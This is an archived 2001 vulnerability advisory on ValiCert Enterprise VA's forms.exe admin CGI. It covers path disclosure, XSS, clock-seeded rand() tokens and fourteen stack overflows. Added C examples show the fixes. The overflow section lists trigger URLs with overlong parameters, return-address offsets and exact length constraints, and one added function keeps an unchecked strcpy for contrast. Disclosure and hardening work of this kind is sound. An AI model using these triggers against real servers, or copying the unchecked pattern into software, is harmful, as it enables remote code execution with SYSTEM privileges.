5th Dec 2001 [SBWID-4896]
COMMAND
ValiCert
SYSTEMS AFFECTED
ValiCert Enterprise VA v3.3 - 4.2.1 releases
PROBLEM
NMRC people (Cyberiad & Phuzzy L0gic) found multiple
vulnerabilities in ValiCert, which provides validity status
responses for X.509 certificates: multiple buffer overflows, a
cross-site scripting problem, path disclosure and a random key
generation problem.
Great job, guys !
Synopsis
--------
Valicert Enterprise VA provides validity status responses for X.509
certificates and supports the following verification mechanisms:
- Certificate Revocation Lists
- CRL Distribution Points
- Online Certificate Status Protocol
The Enterprise VA product architecture consists of:
- Enterprise VA Administration Server for performing management
  activities
- Enterprise VA Host Server for processing validation requests
- VA API defining custom extensions to Enterprise VA.
Numerous vulnerabilities have been located in a CGI script used by the
Enterprise VA Administration Server ranging from information gathering
to system compromise.
[Taken from www.valicert.com] - "ValiCert provides secure solutions
for paperless e-business. Customers across the globe use our products
and services to help migrate costly or inefficient business processes
to the Internet, while maintaining the highest degree of trust and
security."
Tested configuration
--------------------
Testing was done with the following configurations:
Microsoft Windows NT Server 4.0
Microsoft Windows NT Service Pack 6a
The Solaris version was also tested and found to be vulnerable to most
of the overflow issues and one unique issue listed as issue #3.
The vendor, ValiCert - www.valicert.com, has confirmed that all of the
above named versions and operating systems are vulnerable.
Issue #1 - Path Disclosure
--------------------------
A path disclosure issue exists in the forms.exe CGI script used by
Valicert when a new extension is added. Valicert can be extended by
adding new extensions which are processed by custom policies. The
following URL adds the extension, ldp:
http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension
When an invalid extension, such as foobar, is provided in the following
URL:
http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
the server returns an error page with the following text:
Following Input/Configuration file is NOT FOUND in the required location.
FILENAME = foobar
LOCATION = D:\Program Files\ValiCert\EnterpriseVA\entserv
Make sure the file is present in the above location and try again.
This reveals the path to the Valicert installation.
Issue #2 - Cross Site Scripting Problem
----------------------------------------
Due to the lack of input validation and filtering, a cross-site
scripting issue exists in the certificate creation of the Valicert
Administrative interface. A user creating a certificate can insert HTML
code into the descriptive fields. If the certificate is viewed through
the Valicert Administrative server, the HTML is interpreted and any
scripting is executed. As an example, HTML code can be inserted into
the organizational name which is interpreted upon certificate display.
In doing so, a dialog box could be displayed, prompting the operator to
enter a password. Though it is not possible to access unauthorized
resources, it could be used to engineer an individual administering the
Valicert server into entering sensitive data.
If the Administrative server is protected with a password, only those
individuals with the proper username/password can create such a
certificate containing malicious data in the fields.
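The fix for this class of issue is output encoding: every descriptive field is escaped before the administrative page embeds it, so HTML in an organizational name is displayed as text rather than interpreted. The following is an added example and not ValiCert's code; the function names, the buffer sizes and the sample subject values are assumptions constructed for illustration.

```c
/* Added example (not ValiCert's code): encode certificate fields before
 * rendering them in an administrative HTML page. Names and sizes here are
 * constructed for illustration. */
#include <stdio.h>
#include <string.h>

/* Copy src into dst with the five HTML metacharacters encoded.
 * Returns the number of bytes written (excluding the NUL), or -1 if dst
 * is too small; on -1 dst is emptied so a caller can never emit a
 * half-escaped string. */
int html_escape(const char *src, char *dst, size_t dstsz)
{
    size_t used = 0;
    if (dstsz == 0)
        return -1;
    for (; *src; src++) {
        const char *rep;
        char one[2] = { *src, '\0' };
        switch (*src) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (used + n >= dstsz) {      /* leave room for the NUL */
            dst[0] = '\0';
            return -1;
        }
        memcpy(dst + used, rep, n);
        used += n;
    }
    dst[used] = '\0';
    return (int)used;
}

/* Render one certificate field as a table row. 'label' is assumed to be a
 * trusted constant from the page template; 'value' comes from the
 * certificate and is always escaped. Returns 0 on success, -1 if the
 * escaped value did not fit (the field is then omitted, never emitted raw). */
int render_field(FILE *out, const char *label, const char *value)
{
    char esc[1024];
    if (html_escape(value, esc, sizeof esc) < 0)
        return -1;
    fprintf(out, "<tr><td>%s</td><td>%s</td></tr>\n", label, esc);
    return 0;
}

/* Constructed sample: an organizational name carrying markup, as the
 * advisory describes, is rendered harmlessly. */
int demo_render(void)
{
    return render_field(stdout, "Organization",
                        "ACME <script>alert(1)</script> & Co \"Ltd\"");
}
```

Escaping at the point of output, rather than filtering on input, is the durable choice here: the same stored certificate field may be shown by more than one page, and an output encoder cannot be bypassed by data that entered the store through another path.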
Issue #3 - Random Key Generation Issue
--------------------------------------
Valicert generates 'random' tokens for communication with Hardware
Security Modules (which securely store digital certificates) using the C
rand() function call. Furthermore, the C rand() function is seeded
using local system time. Aside from the fact that the value is in
itself predictable, system clock ticks are generally not fine-grained
enough to be used as a good, sole source of entropy. Seeding using local
system time will guarantee that the values output will linearly
increase.
Lastly, if the '/dev/urandom' device exists, Valicert will use it by
default for certificate generation. Although for most purposes the
'/dev/urandom' device is sufficiently safe, it does not perform
blocking when its entropy pool is low. Taking into consideration that
within a PKI, non-repudiation (in the business, not the mathematical
sense) is paramount, the behavior of the '/dev/random' device is much
more favourable.
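The weakness in the first paragraph is easy to demonstrate: rand() is a deterministic generator, so any token drawn from it is a pure function of the seed, and a seed taken from a one-second clock is a tiny, guessable space. The following added example is not ValiCert's code; it shows the weak pattern beside a token drawn from the kernel device, with names and the token size constructed for illustration. A test of the form weak_token_is_reproducible() is the kind of check a build can keep to flag a token generator that is seeded from a predictable value.

```c
/* Added example (not ValiCert's code): a token built from rand() seeded
 * with a clock value is fully reproducible from that value, while a token
 * read from the kernel device is not. Names and sizes are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#define TOKEN_WORDS 4   /* 128-bit token, an assumed size */

/* The weak pattern the advisory describes: seed from a time value, then
 * draw the token from rand(). The 'seed' argument stands in for time(). */
void weak_token(uint32_t seed, uint32_t out[TOKEN_WORDS])
{
    srand(seed);
    for (int i = 0; i < TOKEN_WORDS; i++)
        out[i] = (uint32_t)rand();
}

/* Return 1 if two tokens derived from the same seed are identical, which
 * is exactly the property a security token must not have: anyone who
 * knows (or can bound) the generation time can regenerate it. */
int weak_token_is_reproducible(uint32_t seed)
{
    uint32_t a[TOKEN_WORDS], b[TOKEN_WORDS];
    weak_token(seed, a);
    weak_token(seed, b);
    return memcmp(a, b, sizeof a) == 0;
}

/* Kernel-backed alternative: read the token from /dev/urandom.  Returns 0
 * on success, -1 if the device is unavailable or the read is short, so a
 * caller never proceeds with a partially filled token.  Whether to prefer
 * the blocking /dev/random for signing-key material is the policy question
 * the advisory raises; the read logic is the same with that path. */
int strong_token(uint32_t out[TOKEN_WORDS])
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return -1;
    size_t got = fread(out, sizeof out[0], TOKEN_WORDS, f);
    fclose(f);
    return got == TOKEN_WORDS ? 0 : -1;
}

/* Return 1 if two consecutive kernel-backed tokens differ (they do, with
 * overwhelming probability), 0 if they collide, -1 if the device is
 * unavailable on this system. */
int strong_token_varies(void)
{
    uint32_t a[TOKEN_WORDS], b[TOKEN_WORDS];
    if (strong_token(a) < 0 || strong_token(b) < 0)
        return -1;
    return memcmp(a, b, sizeof a) != 0;
}
```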
Issue #4 - Multiple Buffer Overflows
------------------------------------
Multiple buffer overflows exist in the CGI script, forms.exe, which is
used by the Valicert Enterprise VA Administration Server for management
activities. By default the Administration Server listens on TCP port
13333 and can be configured to require a username and password for
access. Using the Apache v1.3.6 web server for Win32, the
Administration Server allows an operator to use a Web browser to:
configure the Enterprise VA Host server
start/stop the Enterprise VA Host server
request product keys and licenses
create key pairs
add certificates
add or modify certificate stores
add and configure extensions
view logs
In total, fourteen (14) independent and exploitable overflows in
parameters to forms.exe have been identified which allow for code to be
executed with SYSTEM privileges. If the Administrative Server has been
configured to require a username and password for access, the attacker
requires the correct username and password to launch these attacks.
Mode Overflow:
-------------
The following URL is used to switch to server configuration mode,
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
Providing a mode string of 265 bytes overflows a buffer during a copy
located at 0x0040acf8 in forms.exe and overwrites the return address
which is popped off the stack at the subroutine return located at
0x0040adf9.
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode={A x 265}
Analysis of the code and stack contents reveals that the unchecked
buffer is 256 bytes long, followed by two pointers or 32-bit integers
on the stack and then the return address.
Certificate_File Overflow:
-------------------------
The following URL is used to create a Microsoft-type certificate.
Providing a Certificate_Files parameter of 1028 bytes overflows a
buffer during a copy located at 0x0040599a in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x00405cb8.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?CertServerSelection
=Microsoft&Certificate_Type=SHARE&Certificate_Files
={A x 1028}&command=Submit+Certificate+Type
Analysis of the code and stack contents reveals that the unchecked
buffer is 1024 bytes long, immediately followed by the return address
on the stack.
useExpiredCRLs Overflow:
------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the useExpiredCRLs parameter a value of 1288 bytes overflows
a buffer during a copy located at 0x0040b9dc in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod
=0&command=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
listenLength Overflow:
---------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the listenLength parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b54e in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxThread Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxThread parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b5f3 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxConnPerSite Overflow:
-----------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxConnPerSite parameter a value of 1288 bytes overflows
a buffer during a copy located at 0x0040b67f in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxMsgLen Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxMsgLen parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b70b in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
exitTime Overflow:
-----------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the exitTime parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b797 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
blockTime Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b823 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
nextUpdatePeriod Overflow:
-------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the nextUpdatePeriod parameter a value of 1288 bytes overflows
a buffer during a copy located at 0x0040b8af in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
buildLocal Overflow:
-------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the buildLocal parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b950 in forms.exe and overwrites
the return address which is popped off the stack at the subroutine
return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning
=Software&sslSigningType=Software&sslServerHost=&sslCertFile
=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs
=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
maxOCSPValidityPeriod Overflow:
------------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxOCSPValidityPeriod parameter a value of 1288 bytes
overflows a buffer during a copy located at 0x0040ba68 in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked
buffer is 1284 bytes long, immediately followed by the return address
on the stack.
extension Overflows:
-------------------
Valicert can be extended by adding new extensions which are processed
by custom policies. Attempting to add an extension with a file name of
995 bytes in length overflows a buffer at an sprintf located at
0x00417A9B in forms.exe while the error message to be displayed to the
client is constructed. The long string overwrites the return address
which is popped off the stack at the subroutine return located at
0x00417AD0.
http://localhost:13333/cgi-bin/forms.exe?extension={A x 995}&command=Add+Extension
Analysis of the code and stack contents reveals that the subroutine
starting at 0x0040FEC0 makes many unchecked copies while converting the
extension parameter to an absolute filename (i.e. D:\Program
Files\ValiCert\EnterpriseVA\entserv\AAA..) and checking for
existence, etc. During the course of these copies, terminating nulls
in (assumed) fixed-length buffers containing the filename are
overwritten. As a result, the absolute filename passed to the offending
sprintf call is much longer than expected. A solution to the sprintf
problem will still leave the overflows in 0x0040FEC0, which may
possibly be exploited.
Private Key Generation Overflow:
-------------------------------
The operator can use the Administrative Server to generate new private
keys for SSL communications or use in signing OCSP responses. An
overflow exists in the processing of requests for the generation of
private keys. The following is one example of how this overflow can be
triggered by requesting a new private key for SSL communications. Long
strings in any parameter value other than the following:
country_name
gen_self_signed_cert
command
keytype
will also trigger the overflow and overwrite a return address on the
stack. The following URL overwrites the return address with the
opt_company_name value (xxxx).
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name
=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address
=X@X&challenge_password={A x 833}&opt_company_name=xxxx&gen_self_signed_cert
=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1
Analysis of the code and stack contents reveals that the parameters:
country_name
state_name
locality_name
org_name
org_unit_name
common_name
email_address
challenge_password
opt_company_name
are parsed and then reformatted using an sprintf statement called at
0x402C2E8. The destination buffer is too small to contain the results
and overflows, overwriting the return address with the value in the
opt_company_name parameter. The corrupted return address is popped off
the stack at 0x0040C58A. The following set of constraints must be met
for the overflow to occur:
a) The country_name parameter must be exactly two bytes long otherwise
the offending sprintf call is never reached.
b) The email_address parameter must be of the form string@string
otherwise the offending sprintf call is never reached.
c) The total length of all parameters must be 864 bytes for the result
from sprintf to overwrite the return address. Longer lengths will
cause the buffer overflow but will also overwrite parameters passed
to the subroutine, causing the CGI script to crash before the
subroutine terminates and pops off the corrupted return address.
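All of the overflows in this issue share two root causes: fixed-length stack buffers filled by an unchecked copy of a CGI parameter, and sprintf into a buffer that cannot hold the formatted result. The following added example is not ValiCert's code; it places the unchecked pattern beside a bounded replacement and shows a path builder that reports truncation instead of overrunning. The buffer sizes (256 bytes to match the mode buffer reported above), function names and the sample installation path are assumptions for illustration.

```c
/* Added example (not ValiCert's code): the unchecked-copy pattern the
 * advisory describes beside a bounded replacement, and an sprintf-style
 * path builder that detects truncation.  Sizes and names are assumed. */
#include <stdio.h>
#include <string.h>

#define MODE_BUF 256   /* matches the unchecked mode buffer reported above */
#define PATH_BUF 512   /* assumed size for an absolute extension path */

/* Vulnerable pattern, shown for contrast only and never called here:
 * strcpy into a fixed stack buffer with no length check.  A value longer
 * than the buffer walks over whatever follows it on the stack, including
 * the saved return address, which is what the advisory observed. */
void set_mode_unchecked(const char *value)
{
    char mode[MODE_BUF];
    strcpy(mode, value);          /* no length check */
    (void)mode;
}

/* Hardened form: refuse any value that does not fit together with its
 * terminating NUL.  Returns 0 and fills dst on success, -1 (dst emptied)
 * otherwise, so a caller can fail the request with an error page. */
int copy_param_checked(char *dst, size_t dstsz, const char *value)
{
    size_t n = strlen(value);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, value, n + 1);
    return 0;
}

/* Build the absolute extension file name the advisory mentions.  snprintf
 * never writes past dstsz, and a return value >= dstsz means the output was
 * truncated, so the caller sees a failure rather than a silently shortened
 * or overrun path.  Returns the path length on success, -1 on failure. */
int build_extension_path(char *dst, size_t dstsz, const char *base,
                         const char *ext)
{
    int n = snprintf(dst, dstsz, "%s\\%s", base, ext);
    if (n < 0 || (size_t)n >= dstsz) {
        if (dstsz)
            dst[0] = '\0';
        return -1;
    }
    return n;
}

/* Handler in the hardened style: bound the parameter first, then build the
 * path; either failure is reported without touching the file system. */
int add_extension_checked(const char *base, const char *ext_param, char *path,
                          size_t pathsz)
{
    char ext[MODE_BUF];
    if (copy_param_checked(ext, sizeof ext, ext_param) < 0)
        return -1;
    return build_extension_path(path, pathsz, base, ext) < 0 ? -1 : 0;
}
```

The length check must count the terminating NUL; a copy that admits exactly MODE_BUF characters still writes one byte past the buffer, which is why the check is `n >= dstsz` and not `n > dstsz`. The same rule applies to snprintf's return value, which reports the length that would have been written, not the number of bytes stored.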
SOLUTION
NMRC offers the following suggestions to prevent these vulnerabilities
from being exploited:
If remote web administration is required, do so over an SSL connection
to prevent the admin user id and password from being captured.
Otherwise, blocking TCP port 13333, which is used for remote admin,
would prevent the overflows from being successful.
According to ValiCert
(http://www.valicert.com/support/security_advisory_eva.html):
All these considerations have been fixed in EVA 4.2.2, which is currently
available and can be obtained by contacting support@valicert.com.